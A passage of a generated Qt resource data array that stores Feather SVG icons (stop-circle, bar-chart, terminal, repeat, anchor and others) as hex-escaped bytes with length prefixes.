\x36\x2e\x39\x32\x76\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x2d\x32\x2e\x31\x38\x20\x32\x20\x31\x39\x2e\x37\x39\x20\x31\x39\
\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x38\x2e\x36\x33\x2d\x33\
\x2e\x30\x37\x20\x31\x39\x2e\x35\x20\x31\x39\x2e\x35\x20\x30\x20\
\x30\x20\x31\x2d\x36\x2d\x36\x20\x31\x39\x2e\x37\x39\x20\x31\x39\
\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x30\x37\x2d\x38\
\x2e\x36\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x34\x2e\
\x31\x31\x20\x32\x68\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x20\x31\x2e\x37\x32\x20\x31\x32\x2e\x38\x34\x20\x31\x32\
\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x2e\x37\x20\x32\x2e\x38\
\x31\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x2e\x34\x35\x20\
\x32\x2e\x31\x31\x4c\x38\x2e\x30\x39\x20\x39\x2e\x39\x31\x61\x31\
\x36\x20\x31\x36\x20\x30\x20\x30\x20\x30\x20\x36\x20\x36\x6c\x31\
\x2e\x32\x37\x2d\x31\x2e\x32\x37\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x2e\x31\x31\x2d\x2e\x34\x35\x20\x31\x32\x2e\x38\
\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x32\x2e\
\x38\x31\x2e\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x32\x20\x31\x36\x2e\x39\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x35\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x74\x6f\x70\x2d\
\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\
\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\
\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x39\x22\x20\x79\x3d\x22\x39\
\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x36\x22\x20\x68\x65\x69\x67\
\x68\x74\x3d\x22\x36\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x63\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x61\x72\x2d\x63\
\x68\x61\x72\x74\x2d\x32\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x38\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\
\x3d\x22\x31\x38\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x31\
\x32\x22\x20\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x36\x22\x20\x79\x31\
\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x36\x22\x20\x79\x32\x3d\
\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x85\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x65\x68\x22\x3e\
\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\
\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\
\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x35\x22\x20\x78\x32\x3d\
\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\
\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x39\x2e\x30\x31\
\x22\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\
\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x35\x2e\x30\x31\x22\x20\
\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x4e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x6f\x6c\x6c\x61\
\x72\x2d\x73\x69\x67\x6e\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\
\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\
\x20\x35\x48\x39\x2e\x35\x61\x33\x2e\x35\x20\x33\x2e\x35\x20\x30\
\x20\x30\x20\x30\x20\x30\x20\x37\x68\x35\x61\x33\x2e\x35\x20\x33\
\x2e\x35\x20\x30\x20\x30\x20\x31\x20\x30\x20\x37\x48\x36\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x71\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x69\x6d\x61\x67\x65\
\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\x3d\
\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\x20\x68\
\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\x3d\x22\x32\
\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\
\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x38\x2e\x35\x22\
\x20\x63\x79\x3d\x22\x38\x2e\x35\x22\x20\x72\x3d\x22\x31\x2e\x35\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x31\x20\
\x31\x35\x20\x31\x36\x20\x31\x30\x20\x35\x20\x32\x31\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x3a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x64\x6f\x77\x6e\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x39\
\x20\x31\x30\x20\x34\x20\x31\x35\x20\x39\x20\x32\x30\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\
\x64\x3d\x22\x4d\x32\x30\x20\x34\x76\x37\x61\x34\x20\x34\x20\x30\
\x20\x30\x20\x31\x2d\x34\x20\x34\x48\x34\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x36\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x65\x72\x6d\x69\
\x6e\x61\x6c\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\
\x6f\x69\x6e\x74\x73\x3d\x22\x34\x20\x31\x37\x20\x31\x30\x20\x31\
\x31\x20\x34\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\
\x79\x31\x3d\x22\x31\x39\x22\x20\x78\x32\x3d\x22\x32\x30\x22\x20\
\x79\x32\x3d\x22\x31\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x5c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x69\x74\x61\x6c\x69\
\x63\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x39\x22\
\x20\x79\x31\x3d\x22\x34\x22\x20\x78\x32\x3d\x22\x31\x30\x22\x20\
\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x34\x22\x20\x79\x31\x3d\x22\
\x32\x30\x22\x20\x78\x32\x3d\x22\x35\x22\x20\x79\x32\x3d\x22\x32\
\x30\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x34\x22\x20\x78\
\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x32\x30\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x85\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x61\x64\x69\x6f\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x32\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x31\x36\x2e\x32\x34\x20\x37\x2e\x37\x36\x61\x36\x20\
\x36\x20\x30\x20\x30\x20\x31\x20\x30\x20\x38\x2e\x34\x39\x6d\x2d\
\x38\x2e\x34\x38\x2d\x2e\x30\x31\x61\x36\x20\x36\x20\x30\x20\x30\
\x20\x31\x20\x30\x2d\x38\x2e\x34\x39\x6d\x31\x31\x2e\x33\x31\x2d\
\x32\x2e\x38\x32\x61\x31\x30\x20\x31\x30\x20\x30\x20\x30\x20\x31\
\x20\x30\x20\x31\x34\x2e\x31\x34\x6d\x2d\x31\x34\x2e\x31\x34\x20\
\x30\x61\x31\x30\x20\x31\x30\x20\x30\x20\x30\x20\x31\x20\x30\x2d\
\x31\x34\x2e\x31\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x3d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x6c\x65\x66\x74\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x34\x20\x31\x35\x20\x39\x20\x32\x30\x20\x34\x20\x31\x35\x22\x3e\
\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x32\x30\x20\x34\x68\x2d\x37\x61\x34\x20\x34\
\x20\x30\x20\x30\x20\x30\x2d\x34\x20\x34\x76\x31\x32\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x88\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x65\x70\x65\x61\
\x74\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x20\x32\x31\x20\x35\x20\x31\
\x37\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x33\x20\x31\x31\x56\x39\
\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\x34\x2d\x34\x68\x31\
\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x20\x32\x33\
\x20\x33\x20\x31\x39\x20\x37\x20\x31\x35\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x31\x20\x31\x33\x76\x32\x61\x34\x20\x34\x20\x30\x20\x30\
\x20\x31\x2d\x34\x20\x34\x48\x33\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x59\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6e\x63\x68\x6f\
\x72\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
